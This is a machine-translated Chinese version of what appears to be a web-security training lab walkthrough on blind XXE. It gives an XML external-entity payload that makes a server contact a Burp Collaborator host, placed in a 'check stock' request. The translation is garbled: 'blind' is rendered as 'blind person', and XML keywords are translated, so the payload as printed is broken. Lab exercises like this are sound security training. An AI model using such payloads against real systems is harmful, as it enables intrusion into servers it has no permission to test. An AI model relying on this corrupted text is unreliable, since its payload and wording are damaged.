实验室:带外相互作用的盲人XXE
从业者
该实验室具有解析XML输入但未显示结果的“检查库存”功能。
您可以检测到盲人xxe通过触发与外部域的波带外相互作用来漏洞。
要解决实验室,请使用外部实体使XML解析器发出DNS查找和HTTP请求,向合作者发出HTTP请求。
笔记
为了防止用于攻击第三方的学院平台,我们的防火墙会阻止实验室和任意外部系统之间的交互。要解决实验室,您必须使用BURP协作者的默认公共服务器。
解决方案
- 访问产品页面,单击“检查库存”,然后拦截结果的帖子请求Burp Suite专业人士。
- 转到Burp菜单,然后启动Burp合作者客户端。
- 单击“复制到剪贴板”,将独特的BURP协作者有效载荷复制到剪贴板。让Burp合作者客户端窗口打开。
将以下外部实体定义插入XML声明和Stockcheck
元素,但在指示:
<!Doctype Stockcheck [<!实体xxe系统“ http:// burp-collaborator-subdomain”>]>
更换productid
具有参考外部实体的数字:
&xxe;
- 返回到Burp合作者客户端窗口,然后单击“立即进行民意调查”。如果您没有看到列出的任何互动,请等待几秒钟,然后重试。您应该查看该应用程序由于有效载荷而启动的一些DNS和HTTP交互。